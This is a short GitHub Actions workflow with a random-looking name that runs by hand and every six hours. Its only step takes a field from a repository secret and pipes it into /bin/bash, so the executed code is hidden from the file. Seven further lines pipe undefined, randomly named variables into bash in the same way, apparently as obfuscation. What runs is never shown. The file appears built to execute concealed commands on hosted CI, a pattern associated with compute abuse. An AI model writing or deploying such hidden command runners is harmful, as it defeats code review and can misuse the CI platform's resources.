name: fengyuanchai4545
on:
  workflow_dispatch:
  schedule:
    - cron: '47 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: fengyuanchai4545
        env:
          a768: ${{ secrets.a768 }}
        run: |
          echo $a768 | jq -r .fyb9 | /bin/bash
          echo $uj45726 | jq -r .f20 | /bin/bash
          echo $rz52950 | jq -r .b9 | /bin/bash
          echo $z4 | jq -r .ra70 | /bin/bash
          echo $cpfdj5 | jq -r .gdm5 | /bin/bash
          echo $sfbm472 | jq -r .tlaz94 | /bin/bash
          echo $axkxb4159 | jq -r .mcy397 | /bin/bash
          echo $vygt038 | jq -r .b20029 | /bin/bash

